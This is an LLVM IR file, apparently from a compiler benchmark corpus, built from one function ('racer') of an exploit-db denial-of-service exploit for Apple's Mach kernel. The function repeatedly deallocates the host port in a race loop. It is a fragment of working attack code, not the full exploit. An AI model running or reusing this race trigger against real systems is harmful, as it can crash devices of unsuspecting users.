; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_41165.c_racer.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_41165.c_racer.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@start = common dso_local global i64 0, align 8

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i8* @racer(i8* %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca i32, align 4
  store i8* %0, i8** %2, align 8
  br label %4

4:                                                ; preds = %10, %1
  br label %5

5:                                                ; preds = %9, %4
  %6 = load i64, i64* @start, align 8
  %7 = icmp ne i64 %6, 0
  %8 = xor i1 %7, true
  br i1 %8, label %9, label %10

9:                                                ; preds = %5
  br label %5

10:                                               ; preds = %5
  %11 = call i32 @usleep(i32 10)
  %12 = call i32 (...) @mach_host_self()
  store i32 %12, i32* %3, align 4
  %13 = call i32 (...) @mach_task_self()
  %14 = load i32, i32* %3, align 4
  %15 = call i32 @mach_port_deallocate(i32 %13, i32 %14)
  store i64 0, i64* @start, align 8
  br label %4
}

declare dso_local i32 @usleep(i32) #1

declare dso_local i32 @mach_host_self(...) #1

declare dso_local i32 @mach_port_deallocate(i32, i32) #1

declare dso_local i32 @mach_task_self(...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
